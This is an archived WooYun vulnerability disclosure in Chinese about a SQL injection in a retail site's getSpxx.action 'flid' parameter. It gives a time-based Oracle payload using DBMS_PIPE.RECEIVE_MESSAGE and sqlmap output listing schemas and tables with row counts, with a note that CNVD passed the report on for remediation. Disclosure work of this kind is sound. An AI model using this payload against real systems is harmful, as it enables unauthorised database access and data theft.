乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
http://**.**.**.**/getSpxx.action?flid=1903&page=2http://**.**.**.**:8080/icarttw/getSpxx.action?flid=1884&page=1&type=3&flmc=U%E7%9B%98http://**.**.**.**:8090/getSpxx.action?flid=1665&page=1&type=4sql注入
Payload: flid=-9899 OR 7500=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(101)||CHR(117)||CHR(107),5)&page=2---[16:51:05] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[16:51:05] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[16:51:05] [INFO] fetching database (schema) names[16:51:07] [INFO] the SQL query used returns 17 entries[16:51:08] [INFO] retrieved: COLLEGE[16:51:10] [INFO] retrieved: CTXSYS[16:51:11] [INFO] retrieved: DBSNMP[16:51:13] [INFO] retrieved: DMSYS[16:51:15] [INFO] retrieved: EXCHANGE[16:51:16] [INFO] retrieved: EXFSYS[16:51:18] [INFO] retrieved: MDSYS[16:51:19] [INFO] retrieved: OLAPSYS[16:51:20] [INFO] retrieved: ORDSYS[16:51:23] [INFO] retrieved: OUTLN[16:51:24] [INFO] retrieved: SCOTT[16:51:27] [INFO] retrieved: SYS[16:51:29] [INFO] retrieved: SYSMAN[16:51:30] [INFO] retrieved: SYSTEM[16:51:33] [INFO] retrieved: TSMSYS[16:51:34] [INFO] retrieved: WMSYS[16:51:36] [INFO] retrieved: XDB
available databases [17]:[*] COLLEGE[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXCHANGE[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
Database: EXCHANGE+----------------------------+---------+| Table | Entries |+----------------------------+---------+| JT_WEBG_GYSSPMX | 3078001 || JT_WEBG_CGSHMX | 2372075 || JT_UPDATEUSERLOG_0904 | 2059741 || JT_J_SPXX | 1793591 || JT_J_SPXXSJBACK | 1717493 || XWQ_JT_J_SPXX_KC | 1415286 || JT_WEBG_GYSSPTZ | 1401730 || JT_J_SPXX_TP | 1243834 || XWQ_JT_J_SPXX | 1201511 || JT_WEBG_JTDMX | 1151380 || JT_J_SPXX20110512 | 912994 || JT_J_SPXX_2010_12_29 | 867858 || JT_J_SPXX_2010_12_30 | 867858 || HW_SPXX | 761691 || JT_J_SPXX_0201 | 739357 || SYSLOG | 609240 || TJBB_XSDMX | 401788 || JT_J_SPXX_KC | 390568 || JT_WEBK_XSDMX | 374935 || TJBB_FHDMX | 364391 || XWQ_SPXX2 | 337555 || JT_WEBG_CGSH | 331392 || TJBB_UPLOAD_TEMP_PRODUCTS | 320666 || JT_C_BMSPKFMX | 199028 || JT_J_SPXX_BM | 174764 || JT_C_BMSPKFTZ | 168671 || JT_UPDATEUSERLOG0908 | 166571 || T_LLJL | 166160 || TJBB_ZTSP | 165042 || JKXX_TJBB_XSDMX_BACK | 157737 || TJBB_XSZFRZ | 153738 || JT_WEBK_KHSPTZ | 150463 || TJBB_MANAGEDBLOG | 130298 || JT_J_SJHIS | 114881 || JT_WEBG_JTD | 114732 || JT_J_SPXX_BACK | 111700 || TJBB_XSD | 105825 || JT_J_SPXX_SPJJ | 99378 || TJBB_FHD | 94758 || JT_UPDATEUSERLOG_0903 | 83098 || TJBB_USERSXK | 77705 || TJBB_DXFSRZ | 72353 || TJBB_YXHD_PRODUCTS | 68317 || TJBB_USER | 65396 || HASSENDSMS | 45537 || JT_WEBK_USER | 35995 || JT_WEBG_CGDMX | 34597 || TJBB_DDSHR | 31556 || TJBB_FJDH | 28510 || TJBB_XSDQXTZ | 22693 || JT_WEBK_GGDJXX | 22258 || TEMP_RXSP1 | 21285 || T_SHDZ | 20560 || JT_WEBG_GYSJSDMX | 19914 || T_SHDZTMP | 18144 || T_SCJ | 18019 || TJBB_DTKRZ | 17548 || TJBB_KZSXNR | 16852 || CHECK_LOGIN | 16677 || T_GWC | 15047 || TJBB_TKRZ | 14090 || TJBB_DTK | 13983 || SPXX_TGTEMP | 13512 |
危害等级:中
漏洞Rank:9
确认时间:2015-10-15 09:09
CNVD确认所述情况,已经转由CNCERT下发给天津分中心,由其后续协调网站管理单位处置.
暂无